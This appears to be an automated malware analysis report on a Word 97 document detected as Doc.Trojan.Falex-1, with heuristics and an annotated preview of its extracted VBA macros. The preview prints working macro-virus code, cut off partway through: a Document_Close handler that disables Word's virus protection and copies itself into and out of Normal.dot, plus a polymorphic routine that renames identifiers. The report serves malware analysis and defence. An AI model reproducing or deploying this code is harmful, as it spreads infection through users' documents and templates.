MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word 97 document containing malicious VBA macros. The script attempts to copy its own code into the Normal.dot template, indicating a likely attempt at persistence or propagation. The ClamAV detection 'Doc.Trojan.Falex-1' further supports the malicious nature of the file.
Heuristics 2
-
ClamAV: Doc.Trojan.Falex-1 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Trojan.Falex-1
-
VBA macros detected medium OLE_VBA_MACROS — Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18744 bytes |
| SHA-256: 4e64e814976ca8e110d55a677ee5180e8bd0186b2ca1a2ffe7565dd564e15cb3 | | | |
Preview script — First 1,000 lines of the extracted script
' Module header as recovered by olevba. VB_Name shows the code lives in the
' document's ThisDocument class module, and VB_Base = "1Normal.ThisDocument"
' suggests the module was derived from the Normal template — consistent with
' the Normal.dot copy logic in Document_Close below (TODO confirm against the
' raw OLE streams rather than the decoded text alone).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document_Close event handler: runs when the document is closed and copies the
' VBA module between this document and the Normal template (NormalTemplate),
' in whichever direction is "uninfected" — the persistence behavior the report
' summary refers to. Defensive notes for analysts: it disables Word's virus
' protection prompt, it needs programmatic access to VBProject (in current
' Office versions gated by the "Trust access to the VBA project object model"
' setting, which is normally off), and it writes to Normal.dot, so Normal
' template modification is the observable artifact on an affected host.
Private Sub Document_Close()
' Errors are swallowed, so any step that fails (e.g. VBProject access denied)
' is skipped silently rather than surfacing a dialog.
On Error Resume Next
' Aliases for literal values. Every one of these names also appears in
' PolyIt's rename table (Variable(PolyItVarCount + 16 .. + 23)), so the
' identifiers themselves get rewritten on each copy.
Const Truex = True, Falsex = False, Zero = 0, One = 1, wdFormatDocumentx = wdFormatDocument, wdFormatTemplatex = wdFormatTemplate, DoubleDot = ":"
' Note: in VBA only the last name in each Dim list takes the declared type;
' the preceding ones are Variant. Behavior is unchanged here since the
' values assigned are Booleans / Objects / Strings anyway.
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim activedoc, normaltmp As Object
Dim ActiveDocName, OurCode As String
' First VBA component of the open document and of the Normal template.
Set activedoc = ActiveDocument.VBProject.VBComponents.Item(One)
Set normaltmp = NormalTemplate.VBProject.VBComponents.Item(One)
DocumentInfected = Falsex
NormalTemplateInfected = Falsex
' "Infected" simply means the module contains any code lines at all.
If activedoc.CodeModule.CountOfLines <> Zero Then DocumentInfected = Truex
If normaltmp.CodeModule.CountOfLines <> Zero Then NormalTemplateInfected = Truex
' Turns off Word's built-in macro virus protection warning.
Options.VirusProtection = Falsex
' Only act when exactly one side carries the code (Xor) and the document is
' saved as a .doc or .dot; if both or neither are infected nothing happens.
If (DocumentInfected = Truex Xor NormalTemplateInfected = Truex) And (ActiveDocument.SaveFormat = wdFormatDocumentx Or ActiveDocument.SaveFormat = wdFormatTemplatex) Then
' Direction 1: document -> Normal template.
If DocumentInfected = Truex Then
' Remember whether the template had no pending changes, so it is only
' saved if doing so would not otherwise have prompted the user.
SaveNormalTemplate = NormalTemplate.Saved
' Read the whole module text of this document.
OurCode = activedoc.CodeModule.Lines(One, activedoc.CodeModule.CountOfLines)
' AppendLog is not in the visible listing; presumably records the copy
' (its rename-table entries UserAddy/UserNameTmp/TimeDate hint at a
' user/time stamp) — TODO confirm in the full extracted script.
Call AppendLog(OurCode)
' PolyIt (defined below) rewrites identifiers in OurCode in place.
Call PolyIt(OurCode)
' Write the mutated module into Normal.dot and persist it.
normaltmp.CodeModule.InsertLines One, OurCode
If SaveNormalTemplate = Truex Then NormalTemplate.Save
End If
' Second character of the full path, compared with ":" below to detect a
' drive-letter path (i.e. a document that exists on disk).
ActiveDocName = Mid(ActiveDocument.FullName, 2, One)
' Direction 2: Normal template -> document, when the document is on a
' drive path or has unsaved changes.
If NormalTemplateInfected = Truex And (ActiveDocName = DoubleDot Or ActiveDocument.Saved = Falsex) Then
SaveDocument = ActiveDocument.Saved
' Note: no PolyIt call on this path, the template's module is copied as is.
OurCode = normaltmp.CodeModule.Lines(1, normaltmp.CodeModule.CountOfLines)
activedoc.CodeModule.InsertLines One, OurCode
If SaveDocument = Truex Then ActiveDocument.Save
End If
End If
End Sub
Private Sub PolyIt(ByRef OurCode As String)
On Error Resume Next
Const PolyItVarCount = 16, VarCount = PolyItVarCount + 23, UpperLimit = 15, LowerLimit = 5, AsciiA = 65, AsciiZ = 90, One = 1
Dim Variable(One To VarCount), Variable2(One To VarCount), NewCode As String
Dim CounterI, CounterJ, CounterK As Integer
Dim Changed As Boolean
Variable(1) = "OurCode"
Variable(2) = "VarCount"
Variable(3) = "Variable"
Variable(4) = "Variable2"
Variable(5) = "NewCode"
Variable(6) = "CounterI"
Variable(7) = "CounterJ"
Variable(8) = "CounterK"
Variable(9) = "Changed"
Variable(10) = "PolyIt"
Variable(11) = "PolyItVarCount"
Variable(12) = "UpperLimit"
Variable(13) = "LowerLimit"
Variable(14) = "AsciiA"
Variable(15) = "AsciiZ"
Variable(16) = "One"
Variable(PolyItVarCount + 1) = "SaveDocument"
Variable(PolyItVarCount + 2) = "SaveNormalTemplate"
Variable(PolyItVarCount + 3) = "DocumentInfected"
Variable(PolyItVarCount + 4) = "NormalTemplateInfected"
Variable(PolyItVarCount + 5) = "activedoc"
Variable(PolyItVarCount + 6) = "normaltmp"
Variable(PolyItVarCount + 7) = "AppendLog"
Variable(PolyItVarCount + 8) = "UserAddy"
Variable(PolyItVarCount + 9) = "Chr13"
Variable(PolyItVarCount + 10) = "Chr10"
Variable(PolyItVarCount + 11) = "Comment"
Variable(PolyItVarCount + 12) = "UserAddyTmp"
Variable(PolyItVarCount + 13) = "UserNameTmp"
Variable(PolyItVarCount + 14) = "TimeDate"
Variable(PolyItVarCount + 15) = "ActiveDocName"
Variable(PolyItVarCount + 16) = "Truex"
Variable(PolyItVarCount + 17) = "Falsex"
Variable(PolyItVarCount + 18) = "Zero"
Variable(PolyItVarCount + 19) = "wdFormatDocumentx"
Variable(PolyItVarCount + 20) = "wdFormatTemplatex"
Variable(PolyItVarCount + 21) = "TimeFormat"
Variable(PolyItVarCount + 22) = "DateFormat"
Variable(PolyItVarCount + 23) = "DoubleDot"
Randomize
For CounterI = One To VarCount
For CounterJ = One To Int((UpperLimit - LowerLimit + One) * Rnd + LowerLimit)
Variable2(CounterI) = Variable2(CounterI) & Chr(Int((AsciiZ - AsciiA + 1) * Rnd + AsciiA))
Next CounterJ
... (truncated)